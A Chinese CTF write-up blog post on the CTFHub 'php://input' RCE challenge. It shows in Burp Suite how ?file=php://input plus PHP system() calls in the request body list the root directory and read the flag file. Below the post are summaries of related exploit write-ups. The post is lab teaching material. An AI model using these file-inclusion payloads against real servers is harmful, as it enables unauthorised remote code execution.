【CTFHub】 RCE - php://input

已于 2022-08-09 21:25:43 修改
阅读量528 收藏 2
点赞数
分类专栏: CTF # WEB 文章标签: php 开发语言
于 2022-08-09 21:14:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cx_sam/article/details/126241204
版权
CTF 同时被 2 个专栏收录
4 篇文章 0 订阅
订阅专栏
WEB
4 篇文章 0 订阅
订阅专栏

前言

解题之前我们先来简单了解什么是php://input, 一句话概括就是:一个可以读取没有处理过的原始数据的只读流。在此附上php中文网php://input详解,方便有兴趣的伙伴.

正文

我们已经了解了php://input, 接下来看题.题目给了我们一个文件入口 并说明:当传入的文件的前6个字符等于"php://"时,执行文件内容. 这时,我们就会想到用php://input来传入数据.那如何做呢?

在这里插入图片描述

哈哈..看官有没有想到强大又好用的爆破工具Burpsuite呢.我们用它来拦截试题页的请求,发送到转发器,然后在请求体植入PHP代码 连接到把机服务器.(还不会使用工具的伙伴先花点时间了解工具的基本使用,这里就不赘述啦..)
在转发器的操作具体如下:
在协议头输入: ?/file=php://input
在请求体输入:<?PHP system("ls /"); ?>

在这里插入图片描述

如上图显示,我们已经找到flag文件了,用cat查看即可.在请求体输入:<?PHP system("cat /flag_31474"); ?>

在这里插入图片描述

看到这儿的伙伴是不是觉得很简单!!

cx_sam
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
file_get_contents("php://input")的使用方法
weixin_30940783的博客
05-28 8585
$data=file_get_contents("php://input"); //input是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充,比激活 always_popula...
php黑魔法【CTFphp总结】
热门推荐
大方子
08-24 1万+
前言 php的很多特性再带来编程方面的同时也会带来很多安全隐患,其中一些漏洞在CTF中经常出现,本文大部分示例也是取自CTF题目。这里首先说一下==和===区别。==是比较运算,它不会去检查条件式的表达式的类型,===是恒等,它会检查查表达式的值与类型是否相等,NULL,0,”0″,array()使用==和false比较时,都是会返回true的,而使用===却不会。 注:本文部分内容及代码并非原...
php输入流php://input使用浅析
01-21
在做一个摄像头拍照然后上传的功能,php中使用php://input来获取内容。于是就了解了下php://input。 从官网信息来看,php://input是一个只读信息流,当请求方式是post的,并且enctype不等于”multipart/form-data”时,可以使用php://input来获取原始请求的数据。 看一个简单的例子。 客户端就是一个表单,非常简单。 复制代码 代码如下: <form action=”” method=”POST”>     name: <input type=”text” name=”name” value=”tom” /><br>     age:
CTFHub | php://input
尼泊罗河伯的博客
06-08 1699
简单分析网页显示内容中的源代码,判断如果参数以 php:// 开头,那么执行 include 函数将参数值作为文件包含进来。否则,输出字符串 Hacker!!! 。
ctfhub——php://input
At0m的博客
01-14 6789
首先这道题 有一些知识需要了解。参考 《php伪协议实现命令执行的七种姿势》《php伪协议总结》 首先看一下代码,截取字符串前六个字符需要 与 php://相等,也就是file变量的值 的前六个字符需要与 php://相等。 所以写个题应该是要用到php伪协议。 有一个例子看一下 php伪协议该怎么用。 16年华山杯,源码如下: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($u
ctfshow-web3(伪协议php://input的利用)
Welcome To Myon'Blog !
10-07 1066
这是一个只读信息流,当请求方式是post的,并且enctype不等于”multipart/form-data”时,可以使用php://input来获取原始请求的数据,当enctype等于”multipart/form-data”时php://input是无效的。利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码。,php执行时会将post内容当作文件内容,从而导致。存在文件包含时直接使用PHP伪协议。,当传入的参数作为文件名打开时,可以。
CTFHub技能书解题笔记-RCE-php://input
qq_43006864的博客
02-23 1502
打开题目 很熟悉的源代码界面。 简单的审计一下。 这里提到了php:// 然后if这段代码的意思是file里的前六个字符必须要等于php://(===表示强制等于) 这里回到题目,题目是php://input ,这里引入知识点: php://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data 大家..
Python-Pickle-RCE-Exploit:具有易受攻击的Flask App的简单RCE PoC
03-17
Python-Pickle-RCE-漏洞利用 具有易受攻击的Flask应用程序的简单RCE Pickle PoC 在Python中,pickle模块可让您序列化和反序列化数据。 从本质上讲,这意味着您可以将Python对象转换为字节流,然后稍后在其他进程或...
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
leetcode耗时-RCE-Pipeline:RCE-管道
07-01
RCE 管道? RCE 代表远程代码执行服务/管道,是一个基于 docker 的沙箱环境,用于运行用户提交的不受信任的代码。 RCE 将在隔离环境中测试代码,这样我们就不必担心不受信任的代码可能有意或无意地损坏我们的服务器...
spring-boot-upload-file-lead-to-rce-tricks:spring boot Fat Jar 应用文件上传漏洞到 RCE 的利用技巧
04-12
spring-boot-upload-file-lead-to-rce-tricks一. docker 漏洞环境搭建docker pull landgrey/spring-boot-fat-jar-write-file-rce:1.2docker run -d -p 18081:18081 landgrey/spring-boot-fat-jar-write-file-rce:1.2...
rce-research:rce
02-21
RCE-CS 4287最终版配套包router提供了一个游乐场,用于将代码执行请求路由到run_lang服务器。 包run_lang提供了一个API服务器来回答代码执行查询。软件包images提供了针对不同生态系统的run_lang映像。发展要在本地...
bugku ctf刷题2(php://input&kali-gobuster扫目录)
weixin_63231007的博客
05-14 1012
Cookies 网页与网页源代码里无有用信息 观察url里内容,发现filename存在base64加密,解密后发现是keys.txt。 尝试用 filename访问index.php(原url使用base64,这里也将index.php进行编码)。line没有传值,试着传1,2,3;发现回显类似与源代码。写个python脚本获取一下这个源代码。 得到源代码为: <?php error_reporting(0); $file=base64_decode(isset($_GET['f.
CTFHub php://input
人若无名,便可专心练剑
08-16 349
用于读取源码用于执行php代码。
ctfhub-RCE-文件包含 ,php://input,远程包含​,​ 读取源代码, 命令注入,过滤cat,过滤空格,过滤目录分隔符,过滤运算符,综合过滤练习
weixin_55702959的博客
02-02 3809
目录 文件包含 php://input php://input伪协议 远程包含 ​​ 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符 综合过滤练习 文件包含 打开题目发现代码中有shell.txt直接点击shell打开在post发现是没用的,于是换个方式在?file=shell.txt 进行post php://input php:// 输入输出流 PHP 提供了一些杂项输入/输出(IO)流,允许访问...
fileclude(文件包含漏洞及php://inputphp://filter的使用)
Welcome To Myon'Blog !
04-16 3687
fileclude、文件包含漏洞、php://inputphp://filter、file_get_contents() 函数、empty()函数、isset函数、PHP伪协议
CTFHUB web-rce-php://input
2301_79783285的博客
12-15 348
记录学习过程,如有错误,望大家指正,共同进步。
php 里面的 input_phpphp://input的用法详细
weixin_34227128的博客
03-08 2989
在使用xml-rpc的时候,server端获取client数据,主要是通过php输入流input,而不是$_POST数组,所以,这里主要探讨php输入流php://input.下面的例子摘取的是wordpress中的一段代码,里面有用到http://input,有需要的可以进一步研究,代码如下:if (!isset( $HTTP_RAW_POST_DATA ) ) {$HTTP_RAW_POST_...
如何同步管理1000个设备的VLAN数据?
最新发布
weixin_68261415的博客
05-15 734
为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
ctfhub RCE
08-18
CTFHub RCE(Remote Code Execution)是指在CTFHub平台上利用漏洞或安全问题,远程执行恶意代码或命令的攻击行为。这种攻击通常会利用软件或网站存在的漏洞,通过远程执行代码来获取非授权的访问权限或对系统进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值